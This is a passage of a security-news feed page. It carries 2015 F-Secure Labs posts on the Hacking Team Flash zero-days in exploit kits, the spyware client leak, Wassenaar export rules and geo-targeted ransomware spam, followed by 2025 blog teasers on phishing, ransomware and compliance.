Wouldn't it be great if all browsers supported this prevention feature?

Yeah, we think so, too.

But it's not just browsers; apps with browser functionality can also be affected.

Here's an example of a JavaScript dialog displayed via Cydia.

error1014.com

The end of the Telegraph's article included the following advice from City of London police:

"Never give your iCloud username and password or your bank details to someone over the phone."

Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.

Hopefully they stay that way. (They won't.)

On 17/07/15 At 10:15 AM

Hacking Team 0-day Flash Wave with Exploit Kits

Posted by Patricia @ 12:29 GMT

After Hacking Team was compromised, a lot of information was publicly disclosed beginning on the 5th of July, in particular its business clients and a zero-day vulnerability in Adobe Flash Player that they had been using.

Since the info about the first zero-day was made freely available, we knew attackers would swiftly move into using it. As expected, the Flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan, as reported by Kafeine.

Based on our telemetry, there was a rise in Flash exploits beginning on the 6th that continued until the 9th.

overall_stats (11k image)


Here are the stats for each exploit kit:

ek_stats (27k image)


The security advisory for the CVE-2015-5119 zero-day was released on 7th July and the patch was made available on the 8th, so the hits started to decline about two days after the patch.

But just when people had started updating their systems, there was yet another spike in Angler Flash exploit hits:

weekend_wave_stats (22k image)


Apparently, two more Flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two has been added to the Angler exploit kit.

As a side note related to the Angler exploit kit: if you look at the second chart above, Angler and HanJuan share the same statistics. This is because our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.

We verified this after discovering that a different URL pattern was being detected under the Angler name:

angler_vs_hanjuan_urlpattern (9k image)


We looked at the Flash exploit used by both kits, and the two are practically identical.

Angler Flash Exploit:

anglerek_ht0d_3 (26k image)


HanJuan Flash Exploit:

hanjuanek_ht0d_3 (23k image)


There has already been speculation that there are strong connections between the actors behind the two exploit kits. For example, both have used "fileless" delivery of the payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new Flash 0-day as well.

In the meantime, since there isn't a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:

Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A

UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.






On 13/07/15 At 12:29 PM

Read More
The Trusted Internet: Who governs who gets to buy spyware from surveillance software companies?

Posted by FSLabs @ 02:31 GMT


When hackers get hacked, that's when secrets are uncovered. On July 5th, Italy-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.

The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).

According to security researchers at Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on the microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.

Based on images of the client list posted to Pastebin, the software was purchased in Malaysia by the Malaysian Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):

hacking_team_client_list (86k image)

Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally based Malaysian company named Miliserv Technologies (M) Sdn Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligence gathering and public security services:

hacking_team_hack_1 (95k image)

hacking_team_hack_2 (72k image)

Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional-grade spyware ain't cheap - a license upgrade could cost you MYR400,000 and a maintenance renewal will set you back about MYR160,000.

According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.

Coincidentally, Malaysia has also been a frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service providers and government employees. During the 2014 event, Hacking Team was present as the associate lead sponsor.

MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only - though it may be interesting to see if Hacking Team will make it there this year.


Post by – Su Gim




On 08/07/15 At 02:31 AM

Read More
Problematic Wassenaar Definitions

Posted by Sean @ 13:25 GMT


The Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network-capable device. Intrusion software is used to extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.

Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, endpoint security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) and firewalls.

Wassenaar Arrangement definitions
(Source)


So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.

Why is this interesting?

Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.

And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.

The Paradox

So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us malware that uses zero-days all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.

Unintended Consequences

The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software, in what looks like an attempt to limit "hacking" tools, but it says nothing about what is excluded from the scope. So the BIS might not intend to stop customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.




On 09/06/15 At 01:25 PM

Read More
Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT


I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.

_WalkinWiFi

Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean




On 08/06/15 At 01:27 PM

Read More
SMS Exploit Messages

Posted by Sean @ 13:56 GMT


There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter




On 28/05/15 At 01:56 PM

Read More
Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT


In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:

crypt_email (104k image)

When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:

crypt_email_redirect_italy (187k image)

So, no malicious behavior? Well, we noted that the first two URLs pointed to PHP pages. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian, perhaps only a user located in Italy would be served the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:

crypt_email_mal_italy (302k image)

Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:

crypt_email_redirect_spain (74k image)

If the site is visited from a Spanish IP instead, we get to the CAPTCHA screen:

crypt_email_target_spain (57k image)

And then to the malware itself:

crypt_email_mal_spain (313k image)

This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor




On 19/05/15 At 03:17 AM

Read More
Mac Hack Demonstration

Posted by Sean @ 12:46 GMT


Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.

Kids hack their Dad's computer on her Raspberry Pi

Don't worry, it's an authorized hack, she asked her mom for permission.




On 15/05/15 At 12:46 PM

Read More
Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Read More
Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Read More
Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Read More
Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Read More
Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Read More
Phishing for Google Impersonation Attacks

Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

Read More
GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Read More
Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Read More
Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Read More
Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Read More
Complete Protection Guide for Cybersecurity in Energy and Utilities

In May 2023, hackers struck 22 Danish energy companies simultaneously. The coordinated attack breached Denmark’s critical infrastructure in just days, potentially linked to Russia’s Sandworm group. Attackers exploited firewall vulnerabilities with surgical precision, forcing energy companies to disconnect from the national grid and operate in emergency “island mode.” This attack reveals how cyber threats have […]

The post Complete Protection Guide for Cybersecurity in Energy and Utilities appeared first on Heimdal Security Blog.

Read More
The MSP Who Paid His Client’s Ransom and Tripled His Business

Most MSPs will tell you their worst nightmare is getting a call that a client has been breached. Dan Di Pisa lived that nightmare and then did something extraordinary. He paid his client’s $30,000 ransom demand out of his own pocket. The result? He tripled Fusion Cyber Group’s revenue in two to three years without […]

The post The MSP Who Paid His Client’s Ransom and Tripled His Business appeared first on Heimdal Security Blog.

Read More
Your Protection Guide For Cybersecurity in Manufacturing

Cybersecurity in manufacturing businesses is unique. The sector faces several challenges that other industries don’t have to contend with. And the impacts of any disruption are unusually high.  What is more, manufacturers are increasingly finding themselves in the crosshairs of cybercriminals. In 2024, there was a 71% increase in attacks targeting the sector.  In this […]

The post Your Protection Guide For Cybersecurity in Manufacturing appeared first on Heimdal Security Blog.

Read More
Your Protection Guide for Cybersecurity in Retail and Ecommerce

It’s surely the biggest fear of any e-commerce site manager. You try logging into your CRM, CMS or inventory management system one morning, only to be greeted by a ransomware note:  “Your system has been locked. Pay into this crypto wallet to release your data”.  Ecommerce and retail businesses face a range of unique threats […]

The post Your Protection Guide for Cybersecurity in Retail and Ecommerce appeared first on Heimdal Security Blog.

Read More
Attack Surface Management Software: Top 10 Vendors

Key Takeaways: What is attack surface management? Why is attack surface management important? What are the best ASM vendors? Over the last few years, attack surface management (ASM) has become an increasingly common category within cybersecurity. The term describes a set of tools that help organizations to identify their IT assets and the vulnerabilities associated […]

The post Attack Surface Management Software: Top 10 Vendors appeared first on Heimdal Security Blog.

Read More
Scattered Spider Breached Allianz Life – How to Prevent This Threat

Scattered Spider is on the news again – this time they breached Allianz Life. This week’s headlines range from ransomware-ready flaws to physical CCTV vulnerabilities, cloud outages, insurance data breaches, and unfinished patch jobs. Follow cybersecurity advisor Adam Pilton to find out what were the most important threats of the week and how you can […]

The post Scattered Spider Breached Allianz Life – How to Prevent This Threat appeared first on Heimdal Security Blog.

Read More
AI impersonation scams are exploding: Here’s how to spot and stop them

The conversational AI market is exploding. Grand View Research suggests it’s set to jump from $11.58 billion in 2024 to $41.39 billion by 2030, a massive 23.7% annual growth rate. While businesses use AI to boost customer service, cybercriminals are jumping in too, launching slick impersonation scams. These scams are spreading fast. A report from […]

The post AI impersonation scams are exploding: Here’s how to spot and stop them appeared first on Heimdal Security Blog.

Read More
Microsoft SharePoint Zero-Day Disrupts Servers Worldwide

Hey, it’s that time of week again. Cybersecurity Advisor Adam Pilton rips through the five biggest cyber headlines shaking up the internet right now. From a critical SharePoint zero-day vulnerability to ransomware policy overhauls he explains what happened and gives you the actionable steps you need to stay safe. SharePoint zero-day (CVE-2025-53770) under active exploitation […]

The post Microsoft SharePoint Zero-Day Disrupts Servers Worldwide appeared first on Heimdal Security Blog.

Read More
Heimdal® Achieves Fifth Consecutive ISAE 3000 SOC 2 Type II Certification

COPENHAGEN, Denmark, July 23, 2025 – Heimdal is proud to announce that it has once again secured the ISAE 3000 SOC 2 Type II certification, marking the fifth consecutive achievement of this rigorous accreditation. This milestone reflects Heimdal’s long‑standing commitment to data security, operational integrity, and transparency for all customers. Why independent verification matters As […]

The post Heimdal® Achieves Fifth Consecutive ISAE 3000 SOC 2 Type II Certification appeared first on Heimdal Security Blog.

Read More
Inside the Heimdal Labs Deep Dive: A Closer Look at Remote Access Protection

Cybercriminals don’t break in, they log in. From exposed RDP ports to compromised VPN credentials and abused remote tools, remote access remains one of the most common and dangerous entry points for threat actors. It’s the silent doorway that, once opened, can lead to full domain compromise, data exfiltration, and devastating ransomware attacks. That’s why […]

The post Inside the Heimdal Labs Deep Dive: A Closer Look at Remote Access Protection appeared first on Heimdal Security Blog.

Read More
123456 Password Leads to McDonald’s Data Breach

Hey there, it’s time for your Weekly Cyber Snapshot with former Cyber Detective Sergeant Adam Pilton. In less than 5 minutes you’ll be up to speed on the five biggest cyber headlines of the week. From a hacked Muppet to ransomware takedowns, leaky AI at the Golden Arches, a betting breach, and SMBs sleepwalking into […]

The post 123456 Password Leads to McDonald’s Data Breach appeared first on Heimdal Security Blog.

Read More
How Smart MSPs Sell with Compliance, Not Just Tools – With Dustin Bolander

Today we’re digging into one of the most dreaded but potentially most powerful parts of running an MSP compliance. For many providers, compliance feels like a never-ending checklist, a client headache, or worse, a barrier to growth. But what if you could flip that script? What if regulation became your competitive edge? Our guest today […]

The post How Smart MSPs Sell with Compliance, Not Just Tools – With Dustin Bolander appeared first on Heimdal Security Blog.

Read More
Heimdal Achieves IP Co-Sell Ready and MACC Eligible Status with Microsoft

Heimdal can now be purchased through Microsoft’s global sales teams and counts toward Azure spending commitments.  This partnership opens new doors for companies looking to strengthen their cybersecurity while making the most of their existing Microsoft investments.  What this means for you  IP Co-Sell Ready status means Microsoft’s sales teams can now sell Heimdal’s solutions […]

The post Heimdal Achieves IP Co-Sell Ready and MACC Eligible Status with Microsoft appeared first on Heimdal Security Blog.

Read More
Cybersecurity in Education – Definition, Threats, Stats and Solutions

The education sector faces an unprecedented cybersecurity crisis. In just two years, Moody’s has upgraded the risk rating for educational institutions from “moderate” to “high” — a stark warning that schools and universities have become prime targets for cybercriminals. With 217 ransomware attacks hitting educational organizations in the past year alone (a 35% increase), the […]

The post Cybersecurity in Education – Definition, Threats, Stats and Solutions appeared first on Heimdal Security Blog.

Read More
Ingram Micro Ransomware Attack Shakes IT Supply Chain

Your weekly dose of the most urgent cyber threats is here. Adam Pilton distilled it all into five critical stories and five things you should actually do about them. Let’s get into it. Ingram Micro Ransomware Attack Disrupts Global IT Supply Chain Ingram Micro, the lifeline distributor for countless MSPs, was slammed by a SafePay […]

The post Ingram Micro Ransomware Attack Shakes IT Supply Chain appeared first on Heimdal Security Blog.

Read More
ISC Stormcast For Friday, August 8th, 2025 https://isc.sans.edu/podcastdetail/9562, (Fri, Aug 8th)

No summary available.

Read More
ISC Stormcast For Thursday, August 7th, 2025 https://isc.sans.edu/podcastdetail/9560, (Thu, Aug 7th)

No summary available.

Read More
Mass Internet Scanning from ASN 43350 [Guest Diary], (Thu, Aug 7th)

[This is a Guest Diary by Duncan Woosley, an ISC intern as part of the SANS.edu BACS program]

Read More
Do sextortion scams still work in 2025?, (Wed, Aug 6th)

Sextortion e-mails have been with us for quite a while, and these days, most security professionals tend to think of them more in terms of an “e-mail background noise” rather than as if they posed any serious threat. Given that their existence is reasonably well-known even among general public, this viewpoint would seem to be justified… But are sextortion messages really irrelevant as a threat at this point, and can we therefore safely omit this topic during security awareness trainings?

Read More
ISC Stormcast For Wednesday, August 6th, 2025 https://isc.sans.edu/podcastdetail/9558, (Wed, Aug 6th)

No summary available.

Read More
Stealing Machine Keys for fun and profit (or riding the SharePoint wave), (Tue, Aug 5th)

About 10 days ago, exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused; we wrote about that here and here.

Read More
New Feature: Daily Trends Report, (Mon, Aug 4th)

I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback :)

Read More
ISC Stormcast For Tuesday, August 5th, 2025 https://isc.sans.edu/podcastdetail/9556, (Tue, Aug 5th)

No summary available.

Read More
ISC Stormcast For Monday, August 4th, 2025 https://isc.sans.edu/podcastdetail/9554, (Mon, Aug 4th)

No summary available.

Read More
Legacy May Kill, (Sun, Aug 3rd)

Just saw something that I thought was long gone. The username "pop3user" is showing up in our telnet/ssh logs. I don't know how long ago it was that I used POP3 to retrieve e-mail from one of my mail servers. IMAP and various webmail systems have long since replaced this classic email protocol. But at least this one attacker is counting on someone still having a "pop3user" configured.

Read More
FBI Report: Attackers Are Sending Physical Packages with Malicious QR Codes

The FBI has issued an advisory warning that scammers are distributing QR code phishing (quishing) links via unsolicited packages sent by snail mail.

Recipients may scan the code to find out where the package came from, which will land them on a phishing page.

Read More
Anatomy of a Vishing Scam

I hear about a ton of similar-sounding scam calls, where the scammer is pretending to be from a service you use (or used), offering you a substantial monthly discount (30% or more) if you pay some fee ahead of time.

Read More
Social Engineering Attacks Surged in the First Half of 2025

Cybersecurity incidents nearly tripled in the first half of 2025, jumping from 6% in the second half of 2024 to 17% in 2025, according to a new report from LevelBlue.

Read More
Beyond Traditional Defenses: Why French Cyber Resilience Needs to Improve

In today's world, cyberattacks are a constant threat. While technical defenses are crucial, people often remain the easiest attack vector for cybercriminals.

Read More
Warning: New Phishing Campaign Targets Instagram Users

A phishing campaign is targeting Instagram users with phony notifications about failed login attempts, according to researchers at Malwarebytes.

Read More
ClickFix Social Engineering is Becoming More Popular

ClickFix attacks have been around for decades; only the name is new.

Read More
CyberheistNews Vol 15 #31 [Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk

Read More
How Hackers Exploit Microsoft Teams in Social Engineering Attacks

Attackers are using Microsoft Teams calls to trick users into installing the Matanbuchus malware loader, which frequently precedes ransomware deployment, according to researchers at Morphisec.

Read More
If You Think Social Engineering Is Bad, It’s Going To Get Worse

There is no clearer way to say it: social engineering is going to be a lot, lot worse soon, and far more successful than it is today. And that's saying a lot. It's already pretty bad.

Read More
FBI Issues Guidance on Thwarting North Korea’s Fraudulent IT Schemes

The FBI has issued an advisory warning that North Korean IT workers continue to seek fraudulent employment at Western companies.

Read More
MY TAKE: The GenAI security crisis few can see — but these startups are mapping the gaps

LAS VEGAS — A decade ago, the rise of public cloud brought with it a familiar pattern: runaway innovation on one side, and on the other, a scramble to retrofit security practices not built for the new terrain.

Related: GenAI (more…)

The post MY TAKE: The GenAI security crisis few can see — but these startups are mapping the gaps first appeared on The Last Watchdog.

Read More
News alert: SpyCloud’s AI-powered platform mimics veteran analysts, speeds threat detection

Austin, TX, Aug. 6, 2025, CyberNewswire: SpyCloud, the leader in identity threat protection, today announced a significant enhancement to its SaaS Investigations solution: the integration of advanced AI-powered insights that mirror the tradecraft of SpyCloud’s seasoned investigators.

Building on … (more…)

The post News alert: SpyCloud’s AI-powered platform mimics veteran analysts, speeds threat detection first appeared on The Last Watchdog.

Read More
Black Hat Fireside Chat: Inside the ‘Mind of a Hacker’ — A10’s plan for unified threat detection

In today’s threat landscape, attackers are no longer just exploiting technical flaws — they’re exploiting business logic.

Think gaps in workflows, permissions, and overlooked assumptions in how applications behave. This subtle shift is creating powerful new footholds for cybercriminals and … (more…)

The post Black Hat Fireside Chat: Inside the ‘Mind of a Hacker’ — A10’s plan for unified threat detection first appeared on The Last Watchdog.

SHARED INTEL Q&A: From alert to fix — Gomboc brings trusted AI to Infrastructure-as-Code

The promise of AI in cybersecurity has been loudly heralded—yet quietly limited.

Related: What is IaC?

Machine learning has proven effective at spotting anomalies and flagging misconfigurations. But resolving those issues remains largely manual, slow, and labor-intensive. A recent Cloud … (more…)

The post SHARED INTEL Q&A: From alert to fix — Gomboc brings trusted AI to Infrastructure-as-Code first appeared on The Last Watchdog.

News alert: OpenSSL conference to convene experts on cryptography, compliance and open-source

Newark, NJ, Aug. 4, 2025, CyberNewswire—Early Bird registration is now available for the inaugural OpenSSL Conference, scheduled for October 7–9, 2025, in Prague. The event will bring together leading voices in cryptography, secure systems, and open-source infrastructure. Early registrants … (more…)

The post News alert: OpenSSL conference to convene experts on cryptography, compliance and open-source first appeared on The Last Watchdog.

STRATEGIC REEL: Proactive by design: Fortinet retools network defense for real-time threats

Security teams can no longer afford to wait for alerts — not when cyberattacks unfold in milliseconds.

That’s the core warning from Fortinet’s Derek Manky in a new Last Watchdog Strategic Reel recorded at RSAC 2025. As adversaries adopt AI-driven … (more…)

The post STRATEGIC REEL: Proactive by design: Fortinet retools network defense for real-time threats first appeared on The Last Watchdog.

News alert: Comp AI lands $2.6M pre-seed to modernize compliance, disrupt SOC 2 market

San Francisco, Calif., Aug. 1, 2025, CyberNewswire—Comp AI, an emerging player in the compliance automation space, today announced it has secured $2.6 million in pre-seed funding to accelerate its mission of transforming how companies achieve compliance with critical frameworks … (more…)

The post News alert: Comp AI lands $2.6M pre-seed to modernize compliance, disrupt SOC 2 market first appeared on The Last Watchdog.

SHARED INTEL Q&A: Inside the access mess no one sees — and the identity risk no one owns

For decades, identity and access management (IAM) and privileged access management (PAM) sat on the sidelines of cybersecurity strategy—viewed more as IT maintenance than frontline defense.

Related: The hidden threat of rogue access

But that’s changing. Fast.

Historically, security investments … (more…)

The post SHARED INTEL Q&A: Inside the access mess no one sees — and the identity risk no one owns first appeared on The Last Watchdog.

News Alert: SquareX exposes DevTools blind spot allowing widespread browser extension attacks

Palo Alto, Calif., July 29, 2025, CyberNewswire — Despite the expanding use of browser extensions, the majority of enterprises and individuals still rely on labels such as “Verified” and “Chrome Featured” provided by extension stores as a security indicator.

The … (more…)

The post News Alert: SquareX exposes DevTools blind spot allowing widespread browser extension attacks first appeared on The Last Watchdog.

MY TAKE: The signal vs. the noise: email messaging in the era of my AI talking to your AI

Not long ago, I found myself staring at a reply that could’ve come from a bot.

Related: Microsoft purges ‘knowledge workers’

It was a polite follow-up from a PR rep reiterating a pitch I had already acknowledged — and responded … (more…)

The post MY TAKE: The signal vs. the noise: email messaging in the era of my AI talking to your AI first appeared on The Last Watchdog.

Adult sites trick users into Liking Facebook posts using a clickjack Trojan

We found a host of blogspot pages involved in a malware campaign to promote their own content by using a LikeJack Trojan.

Facebook users targeted in ‘login’ phish

Scammers are targeting Facebook users in this latest phishing campaign.

TeaOnHer, the male version of Tea, is leaking personal information on its users too

TeaOnHer turns out to be at least as leaky as its female counterpart, Tea Dating Advice app.

How Google, Adidas, and more were breached in a Salesforce scam

Hackers tricked workers over the phone at Google, Adidas, and more to grant access to Salesforce data.

Meta accessed women’s health data from Flo app without consent, says court

A jury has ruled that Meta accessed sensitive information from women's reproductive health tracking app Flo without consent.

Malwarebytes earns MRG Effitas Android 360° Certificate for mobile threat detection

Malwarebytes has been awarded the prestigious MRG Effitas Android 360° Certificate, one of the toughest independent tests in mobile security.

Weight loss scams, or why ‘Jodie Foster’ wants me to lose weight

Weight loss scams prey on insecurities, and scammers are abusing celebrities and fake news sites to deceive people.

Perplexity AI ignores no-crawling rules on websites, crawls them anyway

Perplexity ignores robots.txt files on websites that say they do not want to be crawled.

Critical Android vulnerabilities patched—update as soon as you can

Google has patched 6 vulnerabilities in Android including two critical ones, one of which can compromise a device without the user needing to do anything.

Alleged ‘tap-in’ scammer advertised services on social media

A 24-year-old woman who allegedly advertised her services on social media has been arrested for her part in a "tap-in" scam.

Unexpected snail mail packages are being sent with scammy QR codes, warns FBI

Receiving an unexpected package in the post is not always a pleasant surprise.

A week in security (July 28 – August 3)

A list of topics we covered in the week of July 28 to August 3, 2025.

Apple ID scam leads to $27,000 in-person theft of Ohio man

An Ohio man lost $27,000 after an Apple ID scam text hit his phone. The strangest part? It happened at his doorstep.

OpenAI kills “short-lived experiment” where ChatGPT chats could be found on Google

OpenAI removed a short-lived experiment that allowed ChatGPT users to make their conversations discoverable by search engines.

Trump Administration and Big Tech want you to share your health data

The Trump Administration is working with 60 companies on a plan to have Americans voluntarily upload their healthcare and medical data.

Prison visitor details shared with all inmates at correctional facility

A Florida correctional institution leaked the names, email addresses, and telephone numbers of visitors to the facility to every inmate.

That seemingly innocent text is probably a scam

Scammers are using texts that appear to have been sent to a wrong number to get targets to engage in a conversation.

VPN use rises following Online Safety Act’s age verification controls

VPN use is skyrocketing across the UK as the region's Online Safety Act places age verification controls on adult websites.

Apple patches multiple vulnerabilities in iOS and iPadOS. Update now!

Apple has released important security updates for iOS and iPadOS patching 29 vulnerabilities, mostly in WebKit.

Tea Dating Advice app has users’ private messages disclosed

After the initial uproar about leaked images, a researcher was able to access Tea Dating app private messages.

A Guide to TOMs (technical and organisational measures) under the GDPR

The GDPR (General Data Protection Regulation) references “appropriate technical and organisational measures” nearly 100 times – yet it stops short of providing a precise definition of the term. This article examines what TOMs are, how they align with the GDPR’s overall objectives, what kinds of controls they typically involve, and how to ensure they’re “appropriate”. What are technical and organisational measures? The GDPR requires data controllers and processors to implement security controls to safeguard personal data against unauthorised access, alteration or destruction. These safeguards are known collectively as technical and organisational measures, or TOMs. TOMs are controls that reduce the

The post A Guide to TOMs (technical and organisational measures) under the GDPR appeared first on IT Governance Blog.

What are the Different Types of Penetration Test?

And how do you choose the right one for your needs? Penetration testing (also known as ‘pen testing’ or ‘ethical hacking’) offers a vital tool for identifying gaps and opportunities to strengthen your security programme. We asked our head of security testing, James Pickard, to explain the different types of test. In this interview Is your security programme effective? Hi James. What are key challenges when implementing a security programme? Resources and costs are often top of the list. Many organisations have a tight budget for security, and lack in-house specialist skills – which doesn’t combine well with the fact

The post What are the Different Types of Penetration Test? appeared first on IT Governance Blog.

The Six Data Processing Principles of the UK GDPR Explained

Article 5 of the UK GDPR (General Data Protection Regulation) sets out six key data processing principles – sometimes informally referred to as data protection principles. These underpin all personal data processing and serve as a practical framework for ensuring compliance. This blog post outlines each of the six principles, explains how they apply in practice and offers guidance on how to demonstrate compliance. What are the GDPR data processing principles? Lawfulness, fairness and transparency Organisations must process personal data in a way that is: These obligations require you to think about how you collect data, what individuals are told

The post The Six Data Processing Principles of the UK GDPR Explained appeared first on IT Governance Blog.

The 4 CRISC Domains Explained

The CRISC® (Certified in Risk and Information Systems Control®) certification from ISACA® is a globally recognised credential for IT and business professionals. Launched in 2010, it has become the benchmark for validating expertise in enterprise risk governance and control management. CRISC is aimed at those operating in or aspiring to work in IT risk management roles, such as risk analysts, control professionals, IT managers and compliance officers. It bridges technical knowledge and strategic risk governance capability. Over 30,000 professionals hold CRISC certifications today. What are the 4 CRISC domains? The CRISC exam tests candidates across four domains, structured to reflect

The post The 4 CRISC Domains Explained appeared first on IT Governance Blog.

What Are ISO 27017 and ISO 27018, and What Are Their Controls?

